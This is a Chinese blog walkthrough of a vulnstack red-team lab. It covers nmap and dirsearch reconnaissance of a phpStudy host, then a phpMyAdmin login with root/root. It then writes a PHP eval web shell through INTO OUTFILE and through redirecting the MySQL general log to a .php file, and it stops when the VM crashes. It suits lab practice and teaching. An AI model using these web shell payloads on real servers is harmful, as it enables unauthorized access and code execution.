01 ATT&CK红队评估

01 ATT&CK红队评估

一、环境搭建

vulnstack-Win2K3 Metasploitable

vulnstack-win7

C盘下开启phpstudy

vulnstack-winserver08

windows7：(内：192.168.52.143 / 外：192.168.31.212(外网根据你的物理机进行分配))
windows2003：(内：192.168.52.141)
windows2008:（内：192.168.52.138）

二、信息搜集

(1)nmap

nmap -T4 -A 192.168.31.212 -o 212.txt 
1

212.txt

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-19 11:26 CST
Nmap scan report for stu1 (192.168.31.212)
Host is up (0.00061s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -24s, deviation: 0s, median: -25s
| smb2-time: 
|   date: 2023-07-19T03:27:30
|_  start_date: 2023-07-19T01:50:17
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 000c29b43b31 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.47 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

(2)dirsearch 80端口探测

[11:28:33] 200 -   14KB - /l.php                                             
[11:28:40] 301 -  241B  - /phpMyAdmin  ->  http://192.168.31.212/phpMyAdmin/ 
[11:28:42] 200 -    4KB - /phpMyAdmin/index.php                              
[11:28:42] 200 -    4KB - /phpMyAdmin/                                       
[11:28:42] 200 -    4KB - /phpMyadmin/                                       
[11:28:42] 200 -   71KB - /phpinfo.php                                       
[11:28:42] 200 -    4KB - /phpmyAdmin/                                       
[11:28:42] 301 -  241B  - /phpmyadmin  ->  http://192.168.31.212/phpmyadmin/ 
[11:28:42] 200 -    4KB - /phpmyadmin/                                       
[11:28:42] 200 -    2KB - /phpmyadmin/README                                 
[11:28:42] 200 -   32KB - /phpmyadmin/ChangeLog                              
[11:28:42] 200 -    4KB - /phpmyadmin/index.php                              
[11:28:56] 403 -  226B  - /web.config::$DATA                                 
1
2
3
4
5
6
7
8
9
10
11
12
13

三、web渗透

(1)弱口令登录
http://192.168.31.212/phpmyadmin/ 弱密码 root root
(2)phpmyadmin写马
phpmyadmin中写马两种思路
一,在网站根目录下

①查select @@basedir;

1
2

②利用into outfile进行写
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/cc.php';#网站的根目录
1
2

查看 secure-file-priv 当前的值

show variables like '%secure%';
1

写马失败

二,利用mysql日志写文件
general log 指的是日志保存状态，ON代表开启 OFF代表关闭；
general log file 指的是日志的保存路径。

show variables like '%general%'; #查看日志状态-->即可爆出日志的保存状态和保存路径
SET GLOBAL general_log='on'
SET GLOBAL general_log_file='根目录'#即设置日志保存的根目录的地址-->即典型你要写马的位置
SELECT '<?php eval($_POST["cmd"]);?>'#执行语句-->即在日志文件中会直接生成
1
2
3
4

general_log_file  C:\phpStudy\MySQL\data\stu1.log

1
2

SET GLOBAL general_log='on';
SET GLOBAL general_log_file='C:\phpStudy\WWW\xiaoyu.php';
1
2

写马

访问：

win7崩了哈哈声明：本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：【wpsshop博客】